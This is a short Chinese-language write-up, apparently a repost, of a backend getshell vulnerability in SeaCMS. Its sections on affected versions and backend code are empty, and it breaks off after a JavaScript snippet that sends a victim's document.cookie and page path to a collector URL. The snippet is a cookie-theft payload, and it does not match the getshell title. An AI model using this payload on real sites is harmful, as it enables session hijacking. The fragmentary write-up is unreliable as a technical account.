Seacms getshell

# Seacms getshell

> 原文：[https://www.zhihuifly.com/t/topic/3112](https://www.zhihuifly.com/t/topic/3112)

# Seacms 后台getshell

## 一、漏洞简介

海洋cms是一款简单的php内容管理系统，主要用于视频网站，采用PHP+MYSQL架构，未使用框架

## 二、漏洞影响

## 三、复现过程

后台代码如下

“`
`
“`

这里根本没有经过过滤，直接将变量写进去，可以写一个脚本利用

代码如下

“`
# test.js

var img = new Image();

img.src= “[http://127.0.0.1/test.php?x=](http://127.0.0.1/test.php?x=)” + document.cookie + “&p=” + location.pathname;

# test.php